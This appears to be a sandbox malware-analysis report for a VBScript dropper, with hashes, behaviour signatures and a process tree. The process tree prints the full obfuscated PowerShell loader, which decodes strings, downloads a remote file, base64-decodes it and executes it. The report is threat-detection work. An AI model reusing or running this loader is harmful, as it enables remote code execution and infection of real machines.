Overview

overview

10

Static

static

1

ByDurieuxC...24.vbs

windows7-x64

8

ByDurieuxC...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/10/2024, 01:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ByDurieuxCerere021010024.vbs

  • Size

    25KB

  • MD5

    f0b294ee638bb4d395cd75451e71a6b6

  • SHA1

    8bf584b1806091823b343cd6b49f369258a44d23

  • SHA256

    a5eb3dd84918b7e65d9d2193775aeda26375c600c089dad2eecb9259c7b0dcc2

  • SHA512

    a1c9bbadff52083f88316059598eee4d5d45902d1bf7ba85ce625451195e6721246a2f758b458fa960f24a2f3a0dbf6b7506adc5039f1b197536d3b83711e3cc

  • SSDEEP

    384:XrCiFq74ZyPbHapGgkpLVjbUErWxljm7Gd8y:Xez74ZyPwXoV+xVm6d8y

Score
8/10
discovery

Malware Config

Signatures

  • Blocklisted process makes network request 43 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ByDurieuxCerere021010024.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
      2⤵
      • Blocklisted process makes network request
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab5775.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • memory/2752-20-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2752-21-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2752-22-0x0000000002870000-0x0000000002878000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2752-23-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-24-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-25-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-26-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-27-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-28-0x000007FEF5EAE000-0x000007FEF5EAF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2752-29-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2752-30-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

    Filesize

    9.6MB

    Download